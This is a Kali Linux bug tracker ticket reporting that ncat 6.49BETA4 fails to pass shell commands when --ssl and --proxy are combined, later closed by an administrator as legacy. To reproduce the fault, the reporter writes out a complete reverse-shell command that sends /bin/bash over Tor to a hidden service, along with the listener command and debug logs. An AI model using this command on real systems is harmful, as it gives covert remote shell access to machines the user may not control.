0002628: ncat-6.49BETA4 fails to bind executable when using --ssl and --proxy - Kali Linux Bug Tracker

ID	Project	Category	View Status	Date Submitted	Last Update

0002628	Kali Linux	General Bug	public	2015-09-08 03:02	2018-01-29 12:25

Reporter	pkreuzt	Assigned To	g0tmi1k
Priority	normal	Severity	minor	Reproducibility	always
Status	closed	Resolution	suspended
Product Version	2.0

Summary	0002628: ncat-6.49BETA4 fails to bind executable when using --ssl and --proxy
Description	I'm trying to backdoor my own laptop in a proof of concept of a reverse shell using Tor network. So I set a hidden service and a listening ncat on a desktop computer with Kali-2.0. The laptop also runs Kali-2.0 with ncat to bind a shell through Tor to the hidden service. This is what I get on the slave side: ~$ ncat --ssl -vvv --proxy-type socks5 --proxy 127.0.0.1:9050 myhiddenservice.onion 1234 -e /bin/bash Ncat: Version 6.49BETA4 ( http://nmap.org/ncat ) NCAT DEBUG: Using system default trusted CA certificates and those in /etc/ssl/certs/ca-certificates.crt. NCAT DEBUG: Not doing certificate verification. Ncat: Connected to proxy 127.0.0.1:9050 Ncat: No authentication needed. Ncat: connection succeeded. libnsock nsi_new2(): nsi_new (IOD 0000001) libnsock nsi_new2(): nsi_new (IOD #2) NCAT DEBUG: Executing: /bin/bash Until that, all is fine. On the other side: ~$ ncat --ssl -l -vvv -p 1234 Ncat: Version 6.49BETA4 ( http://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: CC20 6775 3F79 3376 4BB8 F3A5 9A8F BD59 3768 0DA8 NCAT DEBUG: Initialized fdlist with 103 maxfds Ncat: Listening on :::1234 NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3 Ncat: Listening on 0.0.0.0:1234 NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4 NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4 NCAT DEBUG: Initialized fdlist with 100 maxfds NCAT DEBUG: selecting, fdmax 4 NCAT DEBUG: select returned 1 fds ready NCAT DEBUG: fd 4 is ready Ncat: Connection from 127.0.0.1. NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0) NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4 NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4) NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0 Ncat: Connection from 127.0.0.1:52133. NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5 NCAT DEBUG: selecting, fdmax 5 NCAT DEBUG: select returned 1 fds ready NCAT DEBUG: fd 5 is ready NCAT DEBUG: selecting, fdmax 5 [ Here I type some commands, which doesn't show any output ] whoami ls exit Even the "exit" is not executed, I have to hit ctrl-c to stop. If I hit ctrl-c on the other side (backdoored system) I get the following error on the listening side: Ncat: Failed SSL connection from 127.0.0.1: error:00000000:lib(0):func(0):reason(0) And then the retained commands are executed on the shell. This seems to only happen when using --ssl, without it everything runs as expected. Also, when not using --proxy it works correctly with --ssl.

g0tmi1k 2018-01-29 12:25 administrator ~0008112	Due to the age of the OS (Kali Moto [v1], Kali Safi [v2], Kali Rolling 2016.x), these legacy versions are no longer supported. We will be closing this ticket due to inactivity. Please could you see if you are able to replicate this issue with the latest version of Kali Linux - https://www.kali.org/downloads/)? If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information to the issue you are facing,and also give information about your setup? For more information, please read: https://kali.training/topic/filing-a-good-bug-report/

Date Modified	Username	Field	Change
2015-09-08 03:02	pkreuzt	New Issue
2018-01-29 12:25	g0tmi1k	Assigned To	=> g0tmi1k
2018-01-29 12:25	g0tmi1k	Status	new => closed
2018-01-29 12:25	g0tmi1k	Resolution	open => suspended
2018-01-29 12:25	g0tmi1k	Note Added: 0008112